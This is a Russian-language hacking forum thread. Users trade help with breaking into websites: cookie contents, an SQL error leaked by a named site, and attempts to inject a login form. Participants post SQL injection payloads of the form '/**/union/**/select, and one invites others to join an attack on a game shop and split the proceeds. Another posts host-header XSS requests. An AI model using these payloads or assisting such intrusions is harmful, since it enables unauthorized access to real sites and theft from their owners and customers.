Куки сдержат временную информацию, которую оставляет у тебя на компе форум/сайт/вообще скрипт. Это может быть:
пароль
логин
сессия
счетчик посещений
и всё что угодно остальное

С каким софтом происходит извлечение? (Cookie Editor?? )

http://www.redakteur-cup.de/_error.php?error=You+have+an+error+in+your+SQL+syn tax%3B+check+the+manual+that+corresponds+to+your+M ySQL+server+version+for+the+right+syntax+to+use+ne ar+%2778.37.211.6%27+LIMIT+1%27+at+line+1%3Cbr+%2F %3E%3Cbr+%2F%3E%27UPDATE+mdl_counter_ip+SET+ip_las t_action+%3D+%271199739254%27%2C+ip_last_page+%3D+ %27news.php%3Fn%3D22%27%27%2C+ip_user_id+%3D+%27%2 7+WHERE+ip_ip+%3D+%2778.37.211.6%27+LIMIT+1%27&red irect=news.php
Что с этим делать?

Что за извлечение??? Откуда куда?
В броузерах есть редактор куков(по крайней мере в опере и огнелисе точно).

в осле нет

Вобщем проблема с раскрытием скули в логине
есть сайт http/site/login.php
Поля мыло и пасс. Реагируют на кавычку обычную в логине, но как дальше быть? Пишет про некорректный запрос и все!

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select 0x78617861'' at line 1

select osc_email_addr from osc_activation where osc_activation=0 and osc_email_addr=''select 0x78617861'

[TEP STOP]

хэлп плз

введи:
'/**/union/**/select/**/'xaxa

а лучше:
'/**/union/**/select/**/1/*

__________________
Карфаген должен быть разрушен...

донт ворк, пишет просто неверный логин.

папка /includes/ открыта для просмотра...

есть имена всех таблиц, больше принципе нечего не накпал.

Те кто хочет быть помочь стукайте а асику, все что поимеем поделим(это гейм шоп)

Всем превед,нашёл тот сайтег прикольный гг))

При скане нашёл такую бадягу- XSS через HTTP:P.

По дефолтовскому коду дали пример:

GET /SITE HTTP/1.1
Host: ivbgj<xscript>XSS</xscript>.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive

P.S.:

SITE- хост разумееца : )

Переделал и отправил:

GET /index.html HTTP/1.1
Host: SITE<xscript>alert('XSS');</xscript>.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive

Серв либо отвечает,либо,если чё переделать слегка, выходит,что вообще молчание:Р

Расскажите, что я сделал(или нахимичил хз),а всё никаг.В подробности уязвимости был дан дефолтовский код.

P.S. Юзил перехватичик+отправщег пакетофф с сайта)(( (Хотя... в HTTP йа нупище,стараюсь=___=).